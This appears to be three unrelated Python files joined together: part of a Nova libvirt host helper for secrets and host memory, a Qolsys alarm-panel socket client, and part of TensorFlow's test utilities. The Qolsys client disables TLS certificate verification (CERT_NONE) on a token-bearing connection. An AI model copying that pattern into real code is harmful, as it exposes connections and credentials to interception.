return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
:param usage_id: name of resource in secret
:param password: optional secret value to set
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.NovaException(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s' % xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error defining a secret with XML: %s') % xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_cpu_count(self):
"""Returns the total numbers of cpu in the host."""
return self._get_hardware_info()[2]
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._get_hardware_info()[1]
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
if CONF.libvirt.virt_type == 'xen':
used = 0
for dom in self.list_instance_domains(only_guests=False):
try:
# TODO(sahid): we should have method list_guests()
# which returns Guest's objects
guest = libvirt_guest.Guest(dom)
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info(self)[2])
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
continue
# skip dom0
if dom.ID() != 0:
used += dom_mem
else:
# the mem reported by dom0 is be greater of what
# it is being used
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used / units.Ki
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self.get_memory_mb_total() - avail / units.Ki
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: a virDomain instance
"""
return self.get_connection().defineXML(xml)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
return self.get_connection().listDevices("pci", flags)
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
|
qolsys_socket.py
|
import json
import socket
import ssl
import sys
import time
import asyncio
import threading
import logging
class qolsys:
################################################################################
# Code
def __init__(self):
self._sock = socket.socket
self._wrappedSocket = ssl.SSLContext.wrap_socket
self._listening_thread = threading.Thread()
self._listener_callback = callable
self._hostname = ""
self._port = 12345
self._token = ""
self._timeout = 60
def create_socket(self, hostname, port, token, cb: callable, timeout=60):
self._hostname = hostname
self._port = port
self._token = token
self._listener_callback = cb
self._timeout = timeout
try:
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(timeout)
#Set the listener callback at the instance level so we can restart the listener if needed
except socket.error:
logging.error('Could not create a socket')
raise
# Wrap SSL
logging.debug("wrapping socket")
self._wrappedSocket = ssl.wrap_socket(self._sock, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1_2)
# Connect to server
try:
#The stupid Qolsys panel requires blocking
# wrappedSocket.setblocking(False)
logging.debug("connecting to socket")
self._wrappedSocket.connect((hostname, port))
logging.debug(("Connected wrappedSocket:", self._wrappedSocket))
logging.debug("Starting listener thread")
self._start_listener()
#self.listening_thread = threading.Thread(target=self.listen, args=([cb]))
#self.listening_thread.start()
logging.debug("started listener")
return True
except socket.error:
logging.error(("Error creating or connecting to socket", sys.exc_info()))
return False
def _start_listener(self):
logging.debug(("Starting listener thread"))
self._listening_thread = threading.Thread(target=self.listen, args=([self._listener_callback]))
self._listening_thread.start()
logging.debug(("started listener thread"))
def _reset_socket(self):
logging.debug(("Detatching from wrapped socket"))
self._wrappedSocket.detach()
logging.debug(("Closing socket"))
self._sock.close()
time.sleep(2)
#self._listening_thread = threading.Thread(target=self.listen, args=([self._listener_callback]))
logging.debug(("Creating socket"))
self.create_socket(self._hostname, self._port, self._token, self._listener_callback, self._timeout)
def send_to_socket(self, message: json):
self._wrappedSocket.send(b'\n')
self._wrappedSocket.send((json.dumps(message)).encode())
return True
def listen(self, cb: callable):
#listening = True
logging.debug("starting listen")
data = ""
#err = ""
while not (self._wrappedSocket._connected):
logging.warning("not connected yet")
logging.debug(self._wrappedSocket._connected)
time.sleep(1)
try:
while self._wrappedSocket._connected:
data = self._wrappedSocket.recv(4096).decode()
if len(data) > 0:
logging.debug(("data received from qolsys panel:", data, "len(data): ", len(data)))
if is_json(data):
try:
cb(data)
except:
logging.error(("Error calling callback:", cb, sys.exc_info()))
#print(data)
else:
if data != 'ACK\n':
pass
#logging.warning(("non json data:", data))
else:
logging.error(("No data received. Bad token? Detatching."))
self._wrappedSocket.detach()
raise NoDataError
except socket.timeout:
logging.debug("socket timeout")
except NoDataError:
self._reset_socket()
raise NoDataError
except:
logging.error(("listen failed/stopped:", sys.exc_info()))
def is_json(myjson):
try:
json_object = json.loads(myjson)
if json_object: return True
except:
if myjson != 'ACK\n':
logging.debug(("not json:", myjson))
logging.debug(("Error:", sys.exc_info()))
return False
class NoDataError(Exception):
pass
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util.protobuf import compare
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(len(a_value.bytes_list.value),
len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(
a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 3, 1, 2],
5: [0, 4, 1, 2, 3]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 2, 3, 1],
5: [0, 2, 3, 4, 1]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
with ops.Graph().as_default():
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# pylint: disable=protected-access
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
return lambda *args, **kwargs: _use_c_api_wrapper(fn, False, *args, **kwargs)
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
return lambda *args, **kwargs: _use_c_api_wrapper(fn, True, *args, **kwargs)
def run_in_graph_and_eager_modes(__unused__=None, graph=None, config=None,
use_gpu=False, force_gpu=False,
reset_test=True):
"""Runs the test in both graph and eager modes.
Args:
__unused__: Prevents sliently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self.setUp()
def run_eager_mode():
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
eager_graph = graph or ops.Graph()
with context.eager_mode():
with eager_graph.as_default():
run_eager_mode()
return decorated
return decorator
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
ops.get_default_graph().seed = random_seed.DEFAULT_GRAPH_SEED
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_helper(self, tensors):
if isinstance(tensors, ops.EagerTensor):
return tensors.numpy()
if isinstance(tensors, resource_variable_ops.ResourceVariable):
return tensors.read_value().numpy()
if isinstance(tensors, tuple):
return tuple([self._eval_helper(t) for t in tensors])
elif isinstance(tensors, list):
return [self._eval_helper(t) for t in tensors]
elif isinstance(tensors, dict):
assert not tensors, "Only support empty dict now."
return dict()
else:
raise ValueError("Unsupported type.")
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.in_eager_mode():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
self.assertTrue(
math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol, err_msg=msg)
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays, or dicts of same, have near values.
This does not support nested dicts.
Args:
a: The expected numpy ndarray (or anything can be converted to one), or
dict of same. Must be a dict iff `b` is a dict.
b: The actual numpy ndarray (or anything can be converted to one), or
dict of same. Must be a dict iff `a` is a dict.
rtol: relative tolerance.
